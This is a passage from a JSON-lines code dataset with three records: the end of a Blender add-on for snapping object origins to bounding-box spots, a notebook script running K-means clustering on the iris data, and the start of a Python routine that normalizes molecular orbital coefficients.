rmt.to_euler()\n\n\t\tif abs(math.degrees(sot.rot_x)) < 0.0001: sot.rot_x = 0\n\t\tif abs(math.degrees(sot.rot_y)) < 0.0001: sot.rot_y = 0\n\t\tif abs(math.degrees(sot.rot_z)) < 0.0001: sot.rot_z = 0\n\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Fixed_Snap(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_fixed_snap'\n\tbl_label = 'Origin Fixed Spot Snap'\n\tbl_description = 'Snap origin position to fixed bounding box/scene point'\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\tprm_spt_mode: bpr.EnumProperty(name= 'Fixed Spot Mode', items= [('1','Active','',1),('2','Multi','',2),('3','To Active','',3),('4','For Each','',4)])\n\tprm_not_active: bpr.BoolProperty(name= 'Exclude Active', default= False, description= 'Only for To Active and For Each modes, leave Active object unchanged')\n\tprm_spt_axis: bpr.EnumProperty(name= 'Proojection Along', items= [('1','X Axis','',1),('2','Y Axis','',2),('3','Z Axis','',3)])\n\tprm_spt_dir: bpr.EnumProperty(name= 'Projection Direction', items= [('1','Positive','',1),('2','Negative','',2)])\n\tprm_spt_space: bpr.EnumProperty(name = 'Projection Space', items= [('1','Global','',1),('2','Local','',2),('3','View','',3),('4','Cursor','',4),('5','Preset','',5)])\n\tprm_spt_spot: bpr.EnumProperty(name='Choose Spot',\n\t\titems= [\n\t\t('np','Projection A Neg - B Pos','',1),\n\t\t('cp','Projection A Cen - B Pos','',2),\n\t\t('pp','Projection A Pos - B Pos','',3),\n\t\t('nc','Projection A Neg - B Cen','',4),\n\t\t('cc','Projection A Cen - B Cen','',5),\n\t\t('pc','Projection A Pos - B Cen','',6),\n\t\t('nn','Projection A Neg - B Neg','',7),\n\t\t('cn','Projection A Cen - B Neg','',8),\n\t\t('pn','Projection A Pos - B Neg','',9),\n\t\t('bom','Border Nesh Spot','',10),\n\t\t('boc','Bound Center Spot','',11),\n\t\t('com','Center Of Mass Spot','',12),\n\t\t('dtp_b','Drop To Spot','',13)])\n\tprm_drp_m: bpr.EnumProperty(name= 'Drop To Mode', items= [('1','Space','',1),('2','Bound','',2)])\n\tprm_drp_sm: bpr.EnumProperty(name= 'Drop To Submode', items= [('1','Zero','',1),('2','Median','',2)])\n\tprm_drp_off: bpr.FloatProperty(name= 'Drop To Offset', subtype = 'DISTANCE', precision= 6)\n\tprm_drp_czpb: bpr.BoolProperty(name= 'Use Custom Zero', default= False, description= 'Only for Drop To Mode = Space + Drop To Submode = Zero')\n\tprm_drp_czpv: bpr.FloatVectorProperty( name= 'Custom Zero', subtype= 'XYZ_LENGTH', unit= 'LENGTH', precision= 6)\n\n\tdef execute(self,context):\n\t\tbob = bpy.ops.object\n\t\tbco = bpy.context\n\t\tbcv = bco.view_layer\n\t\tsot = context.scene.sot_props\n\t\taob = bco.active_object\n\t\tsob = bco.selected_objects\n\n\n\t\tif not 'MESH' in [ob.type for ob in sob]: return report(self,'No MESH objects in selection!!!')\n\t\tif self.prm_spt_mode == '1' or self.prm_spt_mode == '3':\n\t\t\tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\t\t\n\t\t\telif aob.type != 'MESH': return report(self,'ACTIVE object is not MESH type!!!')\n\n\t\tmob = [ob for ob in sob if ob.type == 'MESH']\n\t\taob_r = aob\n\t\tsob_r = sob\n\n\n\t\tglobal spot_sob_matrices_vdata\n\t\tglobal spot_orient_matrix\n\t\tglobal spot_psp_data\n\n\t\tif pr_values == {} and sot.spot_set_space == '5': \n\t\t\tsot.spot_set_space = '1'\n\t\t\tself.prm_spt_space = '1'\n\n\t\tmatrices_vdata_get(self.prm_spt_mode,aob,sob)\n\t\trotation_matrix_get(self.prm_spt_space,bco,sot,aob,sob)\n\t\tspots_calc(self.prm_spt_mode,self.prm_spt_space)\n\t\tprojection_calc(self.prm_spt_axis,self.prm_spt_dir,self.prm_drp_m,self.prm_drp_sm, \\\n\t\t\t\t\t\tself.prm_drp_off,self.prm_drp_czpb,self.prm_drp_czpv)\n\n\t\txl,yl,zl = spot_psp_data[0].get(self.prm_spt_spot)\n\n\t\teob = object_in_edit(bob,sob_r)\n\n\t\tif self.prm_spt_mode == '1':\n\t\t\tset_origin_location(xl,yl,zl,aob,bcv)\n\t\telif self.prm_spt_mode == '2':\n\t\t\tfor tob in mob:\n\t\t\t\tset_origin_location(xl,yl,zl,tob,bcv)\n\t\telif self.prm_spt_mode == '3':\n\t\t\tfor tob in sob_r:\n\t\t\t\tif self.prm_not_active and tob == aob: continue\n\t\t\t\tset_origin_location(xl,yl,zl,tob,bcv)\n\t\telse:\n\t\t\tfor index,tob in enumerate(mob):\n\t\t\t\tif self.prm_not_active and tob == aob: continue\n\t\t\t\txl,yl,zl = spot_psp_data[index].get(self.prm_spt_spot)\n\t\t\t\tset_origin_location(xl,yl,zl,tob,bcv)\n\n\t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\n\t\t# bob = bpy.ops.object\n\t\t# spot = self.prm_set_spot_d\n\t\t# rep = self.report\n\t\t# sot = context.scene.sot_props\n\t\t# bco = bpy.context\n\t\t# bcv = bco.view_layer\n\t\t# aob = bcv.objects.active\n\t\t# sob = bco.selected_objects\n\t\t# aob_r = aob\n\t\t# sob_r = sob\n\n\t\t# if sot.spot_set_pick == '2':\n\t\t# \tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\n\n\t\t# \tpsp = get_snap_spot_active(bco,sot,aob)\n\t\t# \tsot.loc_x,sot.loc_y,sot.loc_z = psp.get(spot)\n\t\t# \tbpy.ops.ed.undo_push(message = 'Pick Spot Location' )\n\n\t\t# else:\n\t\t# \tif sot.spot_set_mode == '1' or sot.REPLACE_ME_PLEASE == '1':\n\n\t\t# \t\tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\n\t\t# \t\tif mesh_check(aob)[0]: return report(self, mesh_check(aob)[1])\n\n\t\t# \t\tpsp = get_snap_spot_active(bco,sot,aob)\n\t\t# \t\tx,y,z = psp.get(spot)\n\n\n\t\t# \t\t'''\n\t\t# \t\tNOTE\n\t\t# \t\tанду пуш, покищо хай полежить\n\t\t# \t\t'''\n\n\t\t# \t\teob = object_in_edit(bob,sob_r)\n\t\t# \t\tif sot.spot_set_mode == '1':\n\t\t# \t\t\tset_origin_location(x,y,z,aob,bcv)\n\t\t# \t\t\t#bpy.ops.ed.undo_push(message = 'SOT Fixed Snap A')\n\t\t# \t\telif sot.spot_set_mode == '2':\n\t\t# \t\t\tfor tob in sob:\n\t\t# \t\t\t\tif sot.spot_set_not_active:\n\t\t# \t\t\t\t\tif tob == aob_r:\n\t\t# \t\t\t\t\t\tcontinue\n\t\t# \t\t\t\tset_origin_location(x,y,z,tob,bcv)\n\t\t# \t\t\t#bpy.ops.ed.undo_push(message = 'SOT Fixed Snap BTA')\n\t\t# \t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\t\t# \tif sot.spot_set_mode == '2':\n\n\t\t# \t\tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\n\t\t# \t\tfor tob in sob:\n\t\t# \t\t\tif mesh_check(tob)[0]:return report(self, mesh_check(tob)[1])\n\n\t\t# \t\teob = object_in_edit(bob,sob_r)\n\t\t# \t\tbpy.ops.ed.undo_push(message = 'SOT Fixed Snap M' )\n\t\t# \t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\t\t# \tif sot.spot_set_mode == '3' and sot.REPLACE_ME_PLEASE == '2':\n\n\t\t# \t\tfor tob in sob:\n\t\t# \t\t\tif mesh_check(tob)[0]:return report(self, mesh_check(tob)[1])\n\n\t\t# \t\teob = object_in_edit(bob,sob_r)\n\t\t# \t\tfor tob in sob:\n\t\t# \t\t\tvdt = tob.data.vertices\n\t\t# \t\t\tobm = tob.matrix_world\n\t\t# \t\t\tsps = spots(sot,obm,vdt)\n\t\t# \t\t\tpsp = projection(sot,obm,sps)[0]\n\t\t# \t\t\tpsp['dtp'] = projection(sot,obm,sps)[2][1]\n\t\t# \t\t\tx,y,z = psp.get(spot)\n\t\t# \t\t\tset_origin_location(x,y,z,tob,bcv)\n\t\t# \t\tbpy.ops.ed.undo_push(message = 'SOT Fixed Snap BPO' )\n\t\t# \t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\t\treturn{'FINISHED'}\n\n\nclass SOT_OT_Fixed_Spot_Pick(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_fixed_spot_pick'\n\tbl_label = 'Fixed Spot Pick Location'\n\tbl_description = 'Pick location of projection spot'\n\n\tprm_spt_mode: bpr.EnumProperty(name= 'Fixed Spot Mode', items= [('1','Active','',1),('2','Multi','',2)])\n\tprm_spt_axis: bpr.EnumProperty(name= 'Proojection Along', items= [('1','X Axis','',1),('2','Y Axis','',2),('3','Z Axis','',3)])\n\tprm_spt_dir: bpr.EnumProperty(name= 'Projection Direction', items= [('1','Positive','',1),('2','Negative','',2)])\n\tprm_spt_space: bpr.EnumProperty(name = 'Projection Space', items= [('1','Global','',1),('2','Local','',2),('3','View','',3),('4','Cursor','',4),('5','Preset','',5)])\n\tprm_spt_spot: bpr.EnumProperty(name='Choose Spot',\n\t\titems= [\n\t\t('np','Projection A Neg - B Pos','',1),\n\t\t('cp','Projection A Cen - B Pos','',2),\n\t\t('pp','Projection A Pos - B Pos','',3),\n\t\t('nc','Projection A Neg - B Cen','',4),\n\t\t('cc','Projection A Cen - B Cen','',5),\n\t\t('pc','Projection A Pos - B Cen','',6),\n\t\t('nn','Projection A Neg - B Neg','',7),\n\t\t('cn','Projection A Cen - B Neg','',8),\n\t\t('pn','Projection A Pos - B Neg','',9),\n\t\t('bom','Border Nesh Spot','',10),\n\t\t('boc','Bound Center Spot','',11),\n\t\t('com','Center Of Mass Spot','',12),\n\t\t('dtp_b','Drop To Spot','',13)])\n\tprm_drp_m: bpr.EnumProperty(name= 'Drop To Mode', items= [('1','Space','',1),('2','Bound','',2)])\n\tprm_drp_sm: bpr.EnumProperty(name= 'Drop To Submode', items= [('1','Zero','',1),('2','Median','',2)])\n\tprm_drp_off: bpr.FloatProperty(name= 'Drop To Offset', subtype = 'DISTANCE', precision= 6)\n\tprm_drp_czpb: bpr.BoolProperty(name= 'Use Custom Zero', default= False, description= 'Only for Drop To Mode = Space + Drop To Submode = Zero')\n\tprm_drp_czpv: bpr.FloatVectorProperty( name= 'Custom Zero', subtype= 'XYZ_LENGTH', unit= 'LENGTH', precision= 6)\n\n\tdef execute(self,context):\n\t\tbco = bpy.context\n\t\tsot = context.scene.sot_props\n\t\taob = bco.active_object\n\t\tsob = bco.selected_objects\n\n\t\tif not 'MESH' in [ob.type for ob in sob]: return report(self,'No MESH objects in selection!!!')\n\t\tif self.prm_spt_mode == '1':\t\n\t\t\tif aob_check(aob)[0]: return report(self, aob_check(aob)[1])\n\t\t\telif aob.type != 'MESH': return report(self,'ACTIVE object is not MESH type!!!')\n\n\t\tglobal spot_sob_matrices_vdata\n\t\tglobal spot_orient_matrix\n\t\tglobal spot_psp_data\n\n\t\tif pr_values == {} and sot.spot_set_space == '5': \n\t\t\tsot.spot_set_space = '1'\n\n\t\tprint('\\nPICK SPOT ------------------------------')\n\n\t\tmatrices_vdata_get(self.prm_spt_mode,aob,sob)\n\t\trotation_matrix_get(self.prm_spt_space,bco,sot,aob,sob)\n\t\tspots_calc(self.prm_spt_mode,self.prm_spt_space)\n\t\tprojection_calc(self.prm_spt_axis,self.prm_spt_dir,self.prm_drp_m,self.prm_drp_sm, \\\n\t\t\t\t\t\tself.prm_drp_off,self.prm_drp_czpb,self.prm_drp_czpv)\n\n\t\tsot.loc_x,sot.loc_y,sot.loc_z = spot_psp_data[0].get(self.prm_spt_spot)\n\n\t\treturn{'FINISHED'}\n\nclass SOT_OT_Convert_Local(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_convert_local'\n\tbl_label = 'SOT_OT_Clear_Value'\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\n\t\trot_mat = mu.Euler((sot.rot_x,sot.rot_y,sot.rot_z), 'XYZ').to_matrix()\n\t\tltr = rot_mat.inverted() @ mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\n\t\tsot.loc_x_ltr = ltr[0]\n\t\tsot.loc_y_ltr = ltr[1]\n\t\tsot.loc_z_ltr = ltr[2]\n\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Convert_From_Local(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_convert_from_local'\n\tbl_label = 'SOT_OT_Clear_Value'\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\t\tglobal rot_update\n\n\t\tif rot_update != 0:\n\t\t\trot_update -= 1\n\n\t\telse:\n\t\t\trot_mat = mu.Euler((sot.rot_x,sot.rot_y,sot.rot_z), 'XYZ').to_matrix()\n\t\t\tgtr = rot_mat @ mu.Vector((sot.loc_x_ltr,sot.loc_y_ltr,sot.loc_z_ltr))\n\n\t\t\tsot.loc_x = gtr[0]\n\t\t\tsot.loc_y = gtr[1]\n\t\t\tsot.loc_z = gtr[2]\n\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Clear_Value(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_clear_value'\n\tbl_label = 'SOT_OT_Clear_Value'\n\n\tcop: bpr.StringProperty(name = '', default = '')\n\tcln_dic = {'loc_x':'= 0','loc_y':'= 0','loc_z':'= 0',\n\t\t\t\t'loc_x_ltr':'= 0','loc_y_ltr':'= 0','loc_z_ltr':'= 0',\n\t\t\t\t'rot_x':'= 0','rot_y':'= 0','rot_z':'= 0',\n\t\t\t\t'z_axis':\"= 'z+'\",'rem_zp':\"= '1'\",'rem_zn':\"= '1'\",\n\t\t\t\t'rem_yp':\"= '1'\",'rem_yn':\"= '1'\",'rem_xp':\"= '1'\",'rem_xn':\"= '1'\",\n\t\t\t\t'drop_to_offset':'= 0', 'czp_x':'= 0', 'czp_y':'= 0', 'czp_z':'= 0',\n\t\t\t\t'draw_spots_scale':'= 1'}\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\t\tif 'multi' in self.cop:\n\t\t\tfor prm in self.cop.split()[1:]:\n\t\t\t\texec('sot.'+ prm + self.cln_dic.get(prm))\n\t\t\tbpy.ops.ed.undo_push(message = 'SOT Clear Value' )\n\t\telse:\n\t\t\texec('sot.'+ self.cop + self.cln_dic.get(self.cop))\n\t\t\tbpy.ops.ed.undo_push(message = 'SOT Clear Value' )\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Draw_Axis(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_draw_loc_rot_axis'\n\tbl_label = 'SOT_OT_Draw_Axis'\n\n\tdef stop(self):\n\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\treturn {'CANCELLED'}\n\n\tdef modal(self,context,event):\n\n\t\tsot = context.scene.sot_props\n\t\n\t\tif not sot.draw_loc_rot_axis:\n\t\t\treturn self.stop()\n\n\t\ttry:\n\t\t\tcontext.area.tag_redraw()\n\t\texcept:\n\t\t\tsot.draw_loc_rot_axis = False\n\t\t\treturn self.stop()\n\n\t\telse:\n\t\t\tcontext.area.tag_redraw()\n\t\t\treturn {'PASS_THROUGH'}\n\n\tdef invoke(self,context,event):\n\t\tfor area in bpy.context.window.screen.areas:\n\t\t\tif area.type == 'VIEW_3D':\n\t\t\t\targs = (self,context)\n\t\t\t\tself.draw_handler = bpy.types.SpaceView3D.draw_handler_add(draw_loc_rot_axis_main, args, 'WINDOW', 'POST_VIEW')\n\t\t\t\tcontext.window_manager.modal_handler_add(self)\n\t\t\t\treturn {'RUNNING_MODAL'}\n\n\nclass SOT_OT_Draw_Presets(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_draw_loc_rot_presets'\n\tbl_label = 'SOT_OT_Draw_Axis'\n\n\tdef modal(self,context,event):\n\n\t\tsot = context.scene.sot_props\n\n\t\tif not sot.draw_loc_rot_presets:\n\t\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\t\treturn {'CANCELLED'}\n\n\t\ttry:\n\t\t\tcontext.area.tag_redraw()\n\t\texcept:\n\t\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\t\tsot.draw_loc_rot_presets = False\n\t\t\treturn {'CANCELLED'}\n\t\telse:\n\t\t\tcontext.area.tag_redraw()\n\t\t\treturn {'PASS_THROUGH'}\n\n\tdef invoke(self,context,event):\n\t\tfor area in bpy.context.window.screen.areas:\n\t\t\tif area.type == 'VIEW_3D':\n\t\t\t\targs = (self,context)\n\t\t\t\tself.draw_handler = bpy.types.SpaceView3D.draw_handler_add(draw_loc_rot_presets_main, args, 'WINDOW', 'POST_VIEW')\n\t\t\t\tcontext.window_manager.modal_handler_add(self)\n\t\t\t\treturn {'RUNNING_MODAL'}\n\n\nclass SOT_OT_Draw_Spots(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_draw_spots'\n\tbl_label = 'SOT_OT_Draw_Spots'\n\n\tdef modal(self,context,event):\n\t\tsot = context.scene.sot_props\n\t\n\t\tif not sot.draw_spots:\n\t\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\t\tsot.draw_spots_recalc = False\n\t\t\treturn {'CANCELLED'}\n\n\t\ttry:\n\t\t\tcontext.area.tag_redraw()\n\t\texcept:\n\t\t\tbpy.types.SpaceView3D.draw_handler_remove(self.draw_handler, 'WINDOW')\n\t\t\tsot.draw_spots_recalc = False\n\t\t\tsot.draw_spots = False\n\t\t\treturn {'CANCELLED'}\n\t\telse:\n\t\t\tcontext.area.tag_redraw()\n\t\t\treturn {'PASS_THROUGH'}\n\n\tdef invoke(self,context,event):\n\t\tfor area in bpy.context.window.screen.areas:\n\t\t\tif area.type == 'VIEW_3D':\n\t\t\t\targs = (self,context)\n\t\t\t\tself.draw_handler = bpy.types.SpaceView3D.draw_handler_add(draw_spots_main, args, 'WINDOW', 'POST_VIEW')\n\t\t\t\tcontext.window_manager.modal_handler_add(self)\n\t\t\t\treturn {'RUNNING_MODAL'}\n\n\n\n\n# PROPPERTIES -----------------------------------------------------\n\n\n\n\n\nclass SOT_PR_Settings_Props(bpy.types.PropertyGroup):\n\n\tloc_rot_from_preset: bpr.BoolProperty(name = '', default = False)\n\tloc_rot_active_batch: bpr.EnumProperty(\n\t\titems= [('1','Active','Set ORIGIN for ACTIVE object only',1),\n\t\t\t\t('2','Batch','Set ORIGIN for EACH object in selection',2)], default= '1')\n\tdraw_loc_rot_axis: bpr.BoolProperty(name = '', default = False, update= prop_update_draw_loc_rot_axis)\n\n\tloc_rot_presets: bpr.EnumProperty(\n\t\titems = enum_updateloc_rot_presets, name = 'Loc/Orient Presets', description = 'Preset')\n\tdraw_loc_rot_presets: bpr.BoolProperty(default= False, update= prop_update_draw_loc_rot_presets)\n\n\tloc_mode: bpr.EnumProperty(items= [('1','Global','',1),('2','Local','',2)], update= prop_update_loc_mode)\n\n\tloc_x: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tloc_y: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tloc_z: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\n\tloc_x_ltr: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6, update= prop_update_loc_ltr)\n\tloc_y_ltr: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6, update= prop_update_loc_ltr)\n\tloc_z_ltr: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6, update= prop_update_loc_ltr)\n\n\trot_x: bpr.FloatProperty(subtype = 'ANGLE', min= -6.28319, max= 6.28319, update= prop_update_rot)\n\trot_y: bpr.FloatProperty(subtype = 'ANGLE', min= -6.28319, max= 6.28319, update= prop_update_rot)\n\trot_z: bpr.FloatProperty(subtype = 'ANGLE', min= -6.28319, max= 6.28319, update= prop_update_rot)\n\n\tz_rem: bpr.BoolProperty(name = 'Z+ Remap', description= 'Remap Z+ axis orientation (may be quite handy for certain cases)', default = False)\n\n\tz_axis: bpr.EnumProperty(name='',\n\t\titems= [('z+','Z+ Same','Z+ axis untached as it is.',1),\n\t\t\t\t('z-','Z- Axis','Z+ use Z- vector',2),\n\t\t\t\t('y+','Y+ Axis','Z+ use Y+ vector',3),\n\t\t\t\t('y-','Y- Axis','Z+ use Y+ vector',4),\n\t\t\t\t('x+','X+ Axis','Z+ use X+ vector',5),\n\t\t\t\t('x-','X- Axis','Z+ use X+ vector',6)], default= 'z+')\n\trem_zp: bpr.EnumProperty(\n\t\titems= [('1','X+ same | Y+ same ','',1),('2','X+ to Y+ | Y+ to X-','',2),\n\t\t\t\t('3','X+ to X- | Y+ to Y-','',3),('4','X+ to Y- | Y+ to X+','',4)], default= '1')\n\trem_zn: bpr.EnumProperty(\n\t\titems= [('1','X+ same | Y+ to Y-','',1),('2','X+ to Y+ | Y+ to X+','',2),\n\t\t\t\t('3','X+ to X- | Y+ same ','',3),('4','X+ to Y- | Y+ to X-','',4)], default= '1')\n\trem_yp: bpr.EnumProperty(\n\t\titems= [('1','X+ same | Y+ to Z-','',1),('2','X+ to Z+ | Y+ to X+','',2),\n\t\t\t\t('3','X+ to X- | Y+ to Z+','',3),('4','X+ to Z- | Y+ to X-','',4)], default= '1')\n\trem_yn: bpr.EnumProperty(\n\t\titems= [('1','X+ same | Y+ to Z+','',1),('2','X+ to Z+ | Y+ to X-','',2),\n\t\t\t\t('3','X+ to X- | Y+ to Z-','',3),('4','X+ to Z- | Y+ to X+','',4)], default= '1')\n\trem_xp: bpr.EnumProperty(\n\t\titems= [('1','X+ to Z- | Y+ same ','',1),('2','X+ to Y+ | Y+ to Z+','',2),\n\t\t\t\t('3','X+ to Z+ | Y+ to Y-','',3),('4','X+ to Y- | Y+ to Z-','',4)], default= '1')\n\trem_xn: bpr.EnumProperty(\n\t\titems= [('1','X+ to Z+ | Y+ same ','',1),('2','X+ to Y+ | Y+ to Z-','',2),\n\t\t\t\t('3','X+ to Z- | Y+ to Y-','',3),('4','X+ to Y- | Y+ to Z+','',4)], default= '1')\n\n\n\tspot_set_pick: bpr.EnumProperty(\n\t\titems= [('1','Set Origin','Set ORIGIN location to FIXED spot',1),\n\t\t\t\t('2','Pick Spot','Pick spots LOCATION values to Location & Orientation panel',2)], default= '1', update= prop_update_spot_set_pick)\n\tspot_set_mode: bpr.EnumProperty(\n\t\titems= [('1','Active','Set ORIGIN for ACTIVE object only',1),\n\t\t\t\t('2','Multi','Set ORIGINS for MULTIPLE objects as if they are single object',2),\n\t\t\t\t('3','To Active','Set ORIGINS of MULTIPLE objects to ACTIVE object spots',3),\n\t\t\t\t('4','For Each','Set ORIGINS for EACH object own spots in selection',4)], default= '1')\n\tspot_set_not_active: bpr.BoolProperty(name = '', description= 'ORIGIN transformation will not affect ACTIVE object', default = False)\n\n\tspot_set_axis: bpr.EnumProperty(items= [('1','X','',1),('2','Y','',2),('3','Z','',3)], description= 'Spots projection AXIS', default= '1')\n\tspot_set_dir: bpr.EnumProperty(items= [('1','Positive','',1),('2','Negative','',2)], description= 'Spots projection ORIENTATION', default= '1')\n\tspot_set_space: bpr.EnumProperty(items= [('1','Global','',1),('2','Local','',2),('3','View','',3),('4','Cursor','',4),('5','Preset','',5)],\n\t\t\t\t\t\t\t\t\tdescription= 'Spots projection SPACE')\n\n\tdrop_to_mode: bpr.EnumProperty(\n\t\titems= [('1','Space','Drop ORIGIN to current SPACE',1),\n\t\t\t\t('2','Bound','Drop ORIGIN to current BOUND in current space',2)], default= '1')\n\tdrop_to_smode: bpr.EnumProperty(\n\t\titems= [('1','Zero','Drop ORIGIN to selected SPACE zero',1),\n\t\t\t\t('2','Median','Drop ORIGIN to MEDIAN between selected objects (designed for multiple objects)',2)], default= '1')\n\tdrop_to_offset: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tdrop_custom_zero: bpr.BoolProperty(name= '', default=False)\n\n\tczp_x: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tczp_y: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\tczp_z: bpr.FloatProperty(subtype = 'DISTANCE', precision= 6)\n\n\tdraw_spots: bpr.BoolProperty(name = '', default = False, update= prop_update_draw_spots)\n\tdraw_spots_recalc: bpr.BoolProperty(name = '', default = True, update= prop_update_draw_spots_recalc,\n\t\t\t\t\t\t\t\t\t\tdescription = 'Recalculate current mesh bound spots manually')\n\tdraw_spots_scale: bpr.FloatProperty(default= 1,precision= 2,min= 0.1, max= 2)\n\tdraw_opt_bndc: bpr.BoolProperty(name = '', default =True)\n\tdraw_opt_bnds: bpr.BoolProperty(name = '', default =True)\n\tdraw_opt_dtpl: bpr.BoolProperty(name = '', default =True)\n\n\nctr = [\n\tSOT_PT_Panel,\n\tSOT_PT_Location_Orientation,\n\tSOT_PT_Location,\n\tSOT_PT_Orientation,\n\tSOT_PT_Presets,\n\tSOT_PT_Fixed_Snap,\n\n\tSOT_OT_Preset_Ren,\n\tSOT_OT_Preset_Add,\n\tSOT_OT_Preset_Add_Cursor,\n\tSOT_OT_Preset_Add_Active,\n\tSOT_OT_Preset_Rem,\n\tSOT_OT_Preset_Rrd,\n\tSOT_OT_Preset_Get,\n\tSOT_OT_Set_Loc_Rot,\n\tSOT_OT_Get_Transform,\n\tSOT_OT_Rotate_Ninety,\n\tSOT_OT_Fixed_Snap,\n\tSOT_OT_Fixed_Spot_Pick,\n\tSOT_OT_Convert_Local,\n\tSOT_OT_Convert_From_Local,\n\tSOT_OT_Clear_Value,\n\n\tSOT_OT_Draw_Axis,\n\tSOT_OT_Draw_Presets,\n\tSOT_OT_Draw_Spots,\n\n\tSOT_PR_Settings_Props]\n\ndef register():\n\tfor cls in ctr:\n\t\tbpy.utils.register_class(cls)\n\tbpy.types.Scene.sot_props = bpy.props.PointerProperty(type=SOT_PR_Settings_Props)\n\ndef unregister():\n\tfor cls in reversed(ctr):\n\t\tbpy.utils.unregister_class(cls)\n\tdel bpy.types.Scene.sot_props\n","repo_name":"IIIFGIII/FG_Tools","sub_path":"SOT/FG_Tools_SOT_V283+.py","file_name":"FG_Tools_SOT_V283+.py","file_ext":"py","file_size_in_byte":83913,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"8308240131","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.style as style\n\n\n# In[2]:\n\n\ndata = pd.read_csv(\"iris.csv\",index_col=0)\ndata.shape\n\n\n# In[3]:\n\n\ndata.head()\n\n\n# In[4]:\n\n\nfrom sklearn.cluster import KMeans\nX=data.iloc[:,:4].values\navg_distance=[]\nfor i in range(1,11):\n clusterer=KMeans(n_clusters=i,random_state=2).fit(X)\n avg_distance.append(clusterer.inertia_) \n\n\n# In[5]:\n\n\nplt.plot(range(1,11), avg_distance)\nplt.xlabel(\"Number of Clusters (k)\")\nplt.ylabel(\"Distance\")\nplt.show()\n\n\n# In[6]:\n\n\nkmeans=KMeans(n_clusters=2,random_state=2)\ny_means=kmeans.fit_predict(X)\n\n\n# In[7]:\n\n\nplt.figure(figsize=[10,8])\nplt.scatter(X[y_means == 0,0], X[y_means == 0,1], \n s = 100, c = \"red\", label = 'cluster 1')\nplt.scatter(X[y_means == 1, 0], X[y_means == 1, 1], \n s = 100, c = 'blue', label = 'cluster 2')\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:,1], \n s = 100, c = 'black', label = 'Centroids')\n\nplt.legend()\nplt.show()\n\n","repo_name":"Shakti299/Prediction-using-Unsupervised-ML","sub_path":"Prediction using Unsupervised ML.py","file_name":"Prediction using Unsupervised ML.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38044576135","text":"\nimport numpy as np\n\nfrom time import time\nfrom toeplitz import tmat\n\n\n\ndef norms(ao_overlaps, coeffs):\n '''\n Given AO overlaps and MO or PAO coefficients, compute the \n norms of the PAOs or MOs.\n \n ao_overlaps : AO overlaps, given as a 'tmat' object.\n pao_coeffs : PAO coefficients, given as a 'tmat' \n object. The elements are stored as \n C_{\\mu, p}, where a row corresponds to\n an AO and a column to an MO or a PAO.\n '''\n coords0 = np.zeros((1, 3), dtype=int) \n \n time1 = time()\n c_tT = coeffs.tT()\n s_tT = ao_overlaps.tT()\n \n # C_tT * S_tT\n cs = c_tT.cdot(s_tT, coords = coeffs.coords)\n time2 = time()\n print('Time for S*C:', time2 - time1)\n \n # (C_tT * S_tT) * C \n time3 = time()\n orb_overlaps = cs.cdot(coeffs, coords = coords0)\n time4 = time()\n print('Time for C * SC:', time4 - time3)\n \n # Return orbital norms, in the same order as the MO or\n # PAO orbitals given in 'coeffs'.\n return np.diagonal(orb_overlaps.get(coords0[0]))\n\n\ndef normalize(coeffs, norms):\n '''\n Given PAO or MO coefficients in the form C_{\\mu, p}^{L},\n where \\mu is an AO and p is an MO or PAO, and \n corresponding norms, return normalized coefficients. \n \n coeffs : MO or PAO coefficients, given as a \n 'tmat' object.\n norms : Norms , given as a 1D Numpy array\n in the same order as the orbitals p\n in 'coeffs'.\n '''\n blocks = []\n # Loop over cell blocks and normalize\n for c in coeffs.coords:\n block = coeffs.get(c) / np.sqrt(norms)\n blocks.append(block)\n \n return tmat(coords = coeffs.coords,\n blocks = np.array(blocks, dtype=float))\n\n\ndef normalize_orbitals(ao_overlaps, coeffs):\n '''\n Normalize the coefficients 'coeffs'.\n \n ao_overlaps : AO overlaps, given as a 'tmat' object.\n coeffs : 